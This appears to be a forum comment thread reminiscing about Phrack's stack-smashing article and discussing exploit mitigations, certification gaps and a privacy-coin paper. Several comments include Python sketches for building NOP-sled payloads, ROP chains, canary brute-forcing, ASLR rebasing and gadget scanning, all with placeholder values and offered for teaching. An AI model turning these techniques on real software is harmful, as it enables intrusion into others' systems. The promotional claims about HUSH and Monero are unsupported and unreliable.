I think one big change these days is just that more people self-publish their writeups and research. There are also a lot more security conferences that people present at, some with a narrower focus than the well-known conferences, leading to more specialty content.
I do a weekly podcast[0] talking just about the latest exploits and strategies/research from the last week, and pulling content for that is basically just following a ton of RSS feeds. There is a lot more getting written these days compared with the years when Phrack was regularly released. Unfortunately it's also more spread out and harder to find.
This article, and then working through the book "Hacking: The Art of Exploitation", taught me the true fundamentals of the C programming language and Linux. The other key ingredient was working through the classic "digital evolution" wargames where you'd SSH into a box as level1 and work your way up from there.
In 2017 I got a second-hand Cisco ASA just to play with the Shadow Brokers tools. EXTRABACON was the codename for the SNMP exploit using a buffer overflow.
This was an interesting exercise because there were NO logs of this happening on the Cisco ASA, not even with every log level ramped up to debug. The only trace was on the console port: an exception in readline() or something like it. Doing security monitoring in daily life, this was, ehm, alarming, but not unexpected. Fixing “no logs” is often a challenge for blue teams.
Anyway, it was alarming enough that I found and read through the Common Criteria EAL4+ certification docs for the Cisco ASA, only to find that SNMP was excluded from the certification scope. I still have the idea in the back of my head to explore other certification docs for other unfortunate scope exclusions.
Also, the lack of mitigations like stack canaries, ASLR, or others was quite surprising for a certified black-box security device on the network perimeter.
CCTL testing of commercial products at basically any level is a joke; you can just look at the list of certified commercial products and the subsequent vulnerability feeds for them. I'm unaware of anyone in the field who takes them seriously.
The assumptions about the environment and the system under test have been the Achilles' heel in every certification I've been part of.
It isn't like the CC folks aren't aware of the problem. The idea was that the Security Target (definition of the system) could declare conformance to a standardized Protection Profile which consumers could use as a shortcut to understanding what was promised.
However, nobody looks at STs or PPs except the vendor and the certifier, so all that work is for naught. You could absolutely get a CC cert with an assumed environment in which the device is unplugged from any network.
Just like almost every FIPS 140 validated crypto module has a "FIPS mode" that is what was validated but is never actually used in production, even by government customers.
Beyond getting slower updates, etc, FIPS mode has the unintentional side effect of being the "look at me I have interesting stuff" flag for potential attackers. It is usually quite easy to determine remotely that a networked device is in FIPS mode, too (due to allowed crypto protocols, etc).
A classic, but these days if you want to reproduce those bugs you need to build your code with -fno-stack-protector, enable an executable stack, disable ASLR in the kernel, and so on.
Those techniques are less useful now, but recreating known exploits is still educational. Once you have buffer overflows handled you can look for more exotic things: format-string attacks and the like.
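The classic payload from the article has a simple layout: a NOP sled, the shellcode, then the guessed return address repeated enough times to land on the saved instruction pointer. A minimal sketch of that construction follows; the buffer size, the 8-byte pad to reach the saved EIP, the address, and the shellcode bytes are all placeholders, not values from a real target:

```python
import struct

def build_payload(buf_len, shellcode, guess_addr, nop_sled=64):
    """1996-style stack-smash payload: [NOP sled][shellcode][return addr * N].
    guess_addr only has to point somewhere into the sled; the wider the sled,
    the sloppier the guess can be. All numbers here are illustrative."""
    nops = b"\x90" * nop_sled                           # x86 NOP (0x90) sled
    ret = struct.pack("<I", guess_addr)                 # little-endian 32-bit address
    pad_len = buf_len + 8 - len(nops) - len(shellcode)  # reach the saved EIP (8 = saved EBP etc., illustrative)
    payload = nops + shellcode + b"A" * max(pad_len, 0)
    payload += ret * 4                                  # repeat so one copy lands on the saved EIP
    return payload

# int3 (0xcc) bytes stand in for real shellcode in this sketch
payload = build_payload(buf_len=128, shellcode=b"\xcc" * 24, guess_addr=0xbffff5a0)
```

A debugger breakpoint opcode stands in for the shellcode so the sketch stays self-contained.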
Without getting too side-tracked: I think the Arch wiki has demonstrated that a community wiki can be very useful. I do hope people continue to contribute to the Debian wiki (although I find myself mostly on Ubuntu of late).
Anyway, there's a certain path from phrack through debian-administration.org that maps out where I find myself today, so happy coincidence to see the two line up in the threads.
I moved from Edinburgh, Scotland, to Helsinki about five years ago. (I'm actually going to complete my post-Brexit registration to retain permanent residency this afternoon!)
The Arch wiki has been very useful to me over the past few years; I guess the barrier to entry there is lower for contributors. On my site I had a fair number of people writing interesting blog posts and comments, but only very, very rarely did anybody submit an article.
I felt like I had a good niche audience, but sadly never quite enough people to keep me really motivated. I'm just glad I managed to set up the redirects to the Wayback Machine; I feel like if the site disappeared for good I'd have lost a chunk of my life!
Not really. If you can overwrite the return address, and you have some time to plan out your payload in advance, you can write a program by “returning” into other bits of the program or its libraries.
Return Oriented Programming (ROP) can bypass the non-executable stack protection, since existing "gadgets" from program memory are executed rather than attacker-provided shellcode.
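As a sketch of the idea: a ROP chain is just a sequence of packed addresses laid down where the saved return address and the following stack slots go. The gadget and function addresses below are hypothetical values for a fixed (non-ASLR, non-PIE) 64-bit binary, as is the 72-byte distance to the saved return address:

```python
import struct

def p64(v):
    """Pack a 64-bit little-endian address, as it sits on an x86-64 stack."""
    return struct.pack("<Q", v)

# Hypothetical addresses, as if read out of a non-ASLR binary:
POP_RDI_RET = 0x0000000000401234   # 'pop rdi ; ret' gadget
BIN_SH_STR  = 0x0000000000402000   # address of a "/bin/sh" string
SYSTEM_PLT  = 0x0000000000401050   # system@plt

def rop_chain():
    """ret2libc-style chain: 'return' to the gadget, which pops the "/bin/sh"
    pointer into rdi, then 'return' into system(). Only code already present
    in the binary executes; nothing on the stack runs as code."""
    return p64(POP_RDI_RET) + p64(BIN_SH_STR) + p64(SYSTEM_PLT)

overflow = b"A" * 72 + rop_chain()   # 72 = hypothetical distance to saved RIP
```

Each `ret` pops the next chain entry, which is what makes the "returning into other bits of the program" framing literal.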
However, stack protection will probably require a separate information leak (to find the canary value) or an arbitrary write (to overwrite it) to bypass, unless the attacker is fortunate enough to find an unprotected function the compiler missed, or a value that changes control flow when overwritten and isn't covered by the canary.
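One classic way to get that canary leak, assuming a forking service where every child inherits the same canary, is a byte-at-a-time brute force against a crash/no-crash oracle. A toy simulation of the idea; the oracle here is a stand-in function, not a real target:

```python
SECRET_CANARY = b"\x00\x9a\x41\x7f"  # stand-in for the process's real canary

def child_survives(guess: bytes) -> bool:
    """Simulated forking service: the child 'crashes' unless the overflow
    preserves the canary prefix exactly (stand-in for a real crash oracle)."""
    return SECRET_CANARY[:len(guess)] == guess

def brute_force_canary(length=4):
    """Recover the canary one byte at a time: each byte takes at most 256
    guesses, so a 4-byte canary falls in <= 1024 tries instead of 2**32."""
    known = b""
    for _ in range(length):
        for b in range(256):
            if child_survives(known + bytes([b])):
                known += bytes([b])
                break
    return known
```

This only works because fork() duplicates the parent's canary into every child; a freshly exec'd process gets a new one.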
ASLR is also a decent mitigation against ROP, since it forces the exploit to obtain an information leak and calculate the randomized memory offset before it can find the library gadgets.
In short, ROP isn't the solution to all the mitigations the parent posted; in fact ASLR is designed to make ROP harder to exploit.
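That said, the leak only has to be a single pointer: intra-library offsets are fixed for a given libc build, so one leaked function address rebases the whole library. A sketch with made-up offsets:

```python
# Offsets as an attacker would read them from their own copy of the same
# libc build (values here are made up for illustration):
PUTS_OFFSET   = 0x080ed0   # offset of puts() inside libc
SYSTEM_OFFSET = 0x050d70   # offset of system() inside libc

def rebase(leaked_puts: int) -> dict:
    """One leaked function pointer defeats ASLR for the whole library:
    the base address moves between runs, but offsets within it do not."""
    base = leaked_puts - PUTS_OFFSET
    assert base & 0xfff == 0, "libc base should be page-aligned"
    return {"base": base, "system": base + SYSTEM_OFFSET}
```

This is why hardened targets usually need two bugs: one to leak, one to corrupt.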
You can exploit using existing code (which is limited), but if you want to inject your own code you typically need to put it on the stack. Maybe one could inject code into the .bss/.data sections, but those are probably protected from execution as well, and the .text section is probably read-only.
I think I actually looked at this, along with an (at the time) recent 0-day in OpenSSH that was found and written up by a couple of Finnish students, as a motivational presentation for PaX and/or grsecurity while at university.
Fully automating ROP is difficult, but people have written many scripts to find interesting "gadgets" that set various registers, and have also found useful "targets" to ROP to, such as a handful of instructions inside most libc implementations' system() that can yield a shell if jumped to, with light constraints.
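The gadget-finding part of those scripts is conceptually simple: scan the executable bytes for `ret` opcodes and collect the short byte windows ending there. A naive sketch (real tools like ROPgadget or ropper disassemble properly; this just shows the search idea):

```python
RET = 0xc3  # x86-64 'ret' opcode

def find_gadgets(code: bytes, max_len=3):
    """Naive gadget scan: for every 'ret' byte, emit the byte windows of up
    to max_len bytes that end in it, mapped to their start offset. x86's
    variable-length encoding means any such window is a candidate gadget."""
    gadgets = {}
    for i, b in enumerate(code):
        if b == RET:
            for back in range(1, max_len + 1):
                if i - back >= 0:
                    gadgets.setdefault(code[i - back:i + 1], i - back)
    return gadgets

# 0x5f is 'pop rdi', so b"\x5f\xc3" is the classic 'pop rdi ; ret' gadget
blob = b"\x55\x48\x89\xe5\x5f\xc3\x90\x5e\xc3"
found = find_gadgets(blob)
```

Because x86 instructions can be decoded starting at any byte, even windows that were never emitted by the compiler as instructions count as gadgets.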
I'm trying to remember where, but I once saw this article presented with a very nice guide to replicating the exploits in a VM on a modern computer.
I think it must have been in university, unfortunately when I look up the course number, the resources seem to be (understandably, I suppose) date gated.
It's a bit disappointing to still see overflows around, but at least blindly smashing the stack is no longer usually exploitable on modern systems with basic security.
I seem to recall there being some efforts to standardize "fixes" for C (the bounds-checked Annex K functions, for example), and they never got adopted by anybody important, so the C development community kind of just failed hardcore to prevent this. IMHO it was never about the tools; it was about how we used them and the interfaces for common conventions.
Actually, I take that back: it is also the tools' fault. GCC should just refuse to compile any reference to strcpy().
It describes new kinds of metadata leakage attacks that can be launched against privacy coins, by adversaries with large budgets, such as professional criminal organizations, blockchain analysis companies and nation states. The privacy coin HUSH has developed this defensive technology and was first to implement it in September 2019.
There is a YouTube video where the author explains why he named the paper this way, this link has the timestamp where it's talked about: https://youtu.be/berM7Dnnoz4?t=405
"This is a whole new research field I am creating, that is why I called it Attacking Zcash Protocol For Fun And Profit, just like Smashing The Stack for Fun And Profit, it created a whole new field"
Also, for the hardcore HN nerds: the paper focuses on Zcash Protocol, but the ideas apply to any cryptocoin with a transaction graph, so Monero is definitely vulnerable. Much more vulnerable than Zcash Protocol.
There are very few unique source codebases which implement privacy coins, maybe a half dozen depending on how lenient you are (i.e. is DASH a privacy coin? Barely, but it could be considered one. Blockchain analysis companies make fun of the "privacy" of DASH.)
I believe when he says "inventing a whole new field" he means inventing a whole new field of attacks and defenses, just like the Phrack paper invented a whole new industry of attacks and then their defenses.
Taking these new kinds of attacks into account, all existing privacy coins are vulnerable. Monero is more vulnerable than Zcash Protocol, since it does not have Zero Knowledge Math. It uses Group Theory, which leaks metadata like crazy.
So why would one pick Hush over other coins like Zcash? Because of less metadata leakage?
What I am trying to get at is: what value does Hush have in the real world? It's a privacy coin, cool, but how can it be adopted/used by institutions etc.? And if the tech is so great, why is no one using it right now?
Should probably be required reading for every programmer, and especially for those who work with memory-unsafe languages. With a side of modern mitigation techniques.[0]
A simple compare and contrast between C and zig/rust/D might be interesting - or even golang for that matter (the idea being that code could be reasonably similar, and yet somewhat idiomatic - and illustrate how the C code is exploitable, but the safe language version isn't - except when made to be).
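To sketch that contrast in a memory-safe language (Python here rather than zig/rust/D, purely for brevity): the same missing length check that silently smashes a C stack frame gets stopped at the buffer boundary instead:

```python
def unsafe_copy(dst: bytearray, src: bytes) -> None:
    """The same bug as C's strcpy-into-fixed-buffer: no length check.
    In a memory-safe language the out-of-bounds write is caught at the
    boundary instead of silently overwriting adjacent memory."""
    for i, b in enumerate(src):
        dst[i] = b   # raises IndexError once i reaches len(dst)

buf = bytearray(16)
try:
    unsafe_copy(buf, b"A" * 100)   # 100 bytes into a 16-byte buffer
    smashed = True
except IndexError:
    smashed = False                # the overflow is detected, not exploited
```

The bug still exists (the copy is wrong), but it degrades to a clean runtime error rather than attacker-controlled control flow, which is the essence of the compare-and-contrast exercise.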
Reading this article back in the day is how I learned how stack smashing works! I also remember when the EFF stopped hosting Phrack because most of their bandwidth was people downloading every issue off the EFF’s web server.
Correction: it was hosted on an anonymous FTP server, not a web server. Also, I was one of those people who downloaded every issue, probably with ncftp.
> The Smash the Stack Wargaming Network hosts several Wargames. A Wargame in our context can be described as an ethical hacking environment that supports the simulation of real world software vulnerability theories or concepts and allows for the legal execution of exploitation techniques. Software can be an Operating System, network protocol, or any userland application.
Since then, I've talked to some people I trust who say they were exploiting overflows prior to 1995 (by a year or so), so it was in the air before then, but I haven't seen much evidence that anything like a full-fledged stack overflow had been exploited in the years between '88 and '95.
Here are a few I'm aware of:
https://www.alchemistowl.org/pocorgtfo/
https://secret.club/